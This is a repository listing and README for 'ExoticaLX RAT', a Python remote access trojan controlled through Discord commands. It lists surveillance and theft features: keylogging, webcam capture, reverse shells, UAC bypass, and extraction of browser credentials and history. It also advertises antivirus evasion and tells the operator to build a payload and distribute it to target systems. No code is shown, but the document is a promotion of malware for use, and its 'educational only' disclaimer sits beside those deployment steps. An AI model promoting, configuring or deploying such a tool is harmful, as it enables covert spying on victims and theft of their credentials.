https://github.com/deadexotic/exotically-flexing-discord-rat
ExoticaLX is a Discord-based remote access tool for educational purposes only. It lets users control a computer remotely through Discord commands. Features include system management, file operations, and the ability to collect browser data. This tool demonstrates how Discord can be used as a command and control channel.
https://github.com/deadexotic/exotically-flexing-discord-rat
discord discord-bot discord-rat discord-rat-bot discord-stealer-fud fud legal rat rat-fud remote-access-tool remote-access-trojan stealer stealer-builder undetectable vm-provisioning vmp
Last synced: about 1 month ago
JSON representation
ExoticaLX is a Discord-based remote access tool for educational purposes only. It lets users control a computer remotely through Discord commands. Features include system management, file operations, and the ability to collect browser data. This tool demonstrates how Discord can be used as a command and control channel.
- Host: GitHub
- URL: https://github.com/deadexotic/exotically-flexing-discord-rat
- Owner: deadexotic
- License: gpl-3.0
- Created: 2025-05-04T12:13:28.000Z (about 1 year ago)
- Default Branch: main
- Last Pushed: 2025-09-02T16:40:58.000Z (9 months ago)
- Last Synced: 2025-09-02T18:28:41.385Z (9 months ago)
- Topics: discord, discord-bot, discord-rat, discord-rat-bot, discord-stealer-fud, fud, legal, rat, rat-fud, remote-access-tool, remote-access-trojan, stealer, stealer-builder, undetectable, vm-provisioning, vmp
- Language: Python
- Homepage:
- Size: 1.59 MB
- Stars: 6
- Watchers: 1
- Forks: 1
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
- License: LICENSE
- Security: SECURITY.md
Awesome Lists containing this project
README
# ๐ ExoticaLX RAT v2.5 ๐
Power and stealth in perfect harmony
[](https://python.org)
[](LICENSE)
[](https://github.com/deadexotic/exotically-flexing-discord-rat/commits/main)
โจ Advanced Remote Access Tool with Enhanced Stealth Capabilities โจ
โ ๏ธ LEGAL DISCLAIMER: FOR EDUCATIONAL PURPOSES ONLY โ ๏ธ
Unauthorized use is strictly prohibited and illegal
## ๐ What's New in v2.5
- **๐ ๏ธ Enhanced Stability** - Fixed critical file truncation issues and infinite loops
- **โฑ๏ธ Timeout Protection** - Added comprehensive timeouts to all network operations and long-running processes
- **๐งน Resource Management** - Implemented proper cleanup for threads, processes, and file handles
- **๐ Fallback Mechanisms** - Added intelligent fallback systems when file operations fail
- **๐ File Integrity** - Added size verification to prevent data loss during file operations
- **โก Performance Improvements** - Optimized browser data extraction with better error handling
- **๐ก๏ธ Enhanced AV Evasion** - Improved detection avoidance with dynamic signature masking
## ๐ Command Categories
Category
Commands
๐ป System Control
-
!shell- Execute command line operations -
!remoteshell- Establish reverse shell connection -
!uacbypass- Attempt privilege escalation -
!sysinfo- Retrieve detailed system information
๐๏ธ Surveillance
-
!webcampic- Capture webcam image -
!screenshot- Take screenshot of current display -
!windowstart- Begin window activity monitoring -
!windowstop- End window monitoring session
๐ฎ System Manipulation
-
!voice- Text-to-speech functionality -
!wallpaper- Change desktop background -
!sing- Play audio in background -
!blockinput- Disable user input (requires admin)
๐ Data Acquisition
-
!steal- Extract browser data and credentials -
!startkeylogger- Begin keystroke monitoring -
!stopkeylogger- End keystroke monitoring -
!dumpkeylogger- Retrieve logged keystrokes -
!clipboard- Capture clipboard contents -
!history- Retrieve browsing history
## ๐ Installation Guide
- Create a Discord bot and obtain token here
- Add bot to your server with appropriate permissions
- Enable all privileged intents in the Discord Developer Portal
- Run the builder.py script to configure your payload
- Distribute the generated executable to target systems
- Control via Discord commands in your private channel
## ๐ Full Command List
Click to view all available commands
### ๐ป System Commands
`!shell [command]` - Execute system commands
`!admincheck` - Verify administrative privileges
`!sysinfo` - Retrieve system information
`!cd [directory]` - Change current directory
`!download [file]` - Download file from target
`!upload [file]` - Upload file to target
### ๐๏ธ Surveillance
`!webcampic` - Capture webcam image
`!screenshot` - Capture screen
`!windowstart` - Begin window activity monitoring
`!windowstop` - End window monitoring
`!idletime` - Check user idle time
### ๐ Data Collection
`!steal` - Extract browser data
`!startkeylogger` - Begin keystroke monitoring
`!stopkeylogger` - End keystroke monitoring
`!dumpkeylogger` - Retrieve logged keystrokes
`!clipboard` - Capture clipboard contents
`!history` - Retrieve browsing history
`!geolocate` - Approximate target location
### ๐ฎ System Control
`!voice [text]` - Text-to-speech output
`!wallpaper` - Change desktop background
`!sing [url]` - Play YouTube audio
`!stopsing` - Stop audio playback
`!volumemax` - Set volume to maximum
`!volumezero` - Mute volume
`!blockinput` - Disable user input (admin required)
`!unblockinput` - Re-enable user input
`!write [text]` - Simulate keyboard input
`!message [text]` - Display message box
`!exit` - Terminate RAT process
`!kill [session/all]` - End specific or all sessions
## โ ๏ธ Legal Disclaimer
THIS SOFTWARE IS PROVIDED FOR EDUCATIONAL PURPOSES ONLY.
UNAUTHORIZED USE IS STRICTLY PROHIBITED AND MAY RESULT IN:
- Criminal prosecution
- Financial penalties
- Law enforcement action
## ๐ Support
## ๐ก๏ธ Stability Improvements in v2.5
Critical Fixes
-
File Truncation Fix - Resolved critical issue where builder.py was truncating rat_source.py to only 317 lines -
File Integrity Protection - Added multiple verification steps to prevent data loss during file operations -
Automatic Fallbacks - Implemented fallback to main.py when rat_source.py is corrupted or truncated
Performance Enhancements
-
Timeout Protection - Added comprehensive timeouts to all network operations and long-running processes -
Resource Management - Implemented proper cleanup for threads, processes, and file handles -
Error Recovery - Enhanced error handling with intelligent recovery mechanisms -
Browser Data Extraction - Optimized stealer function with proper timeout protection to prevent hanging -
Reverse Shell Stability - Improved reliability of remote shell connections with heartbeat mechanism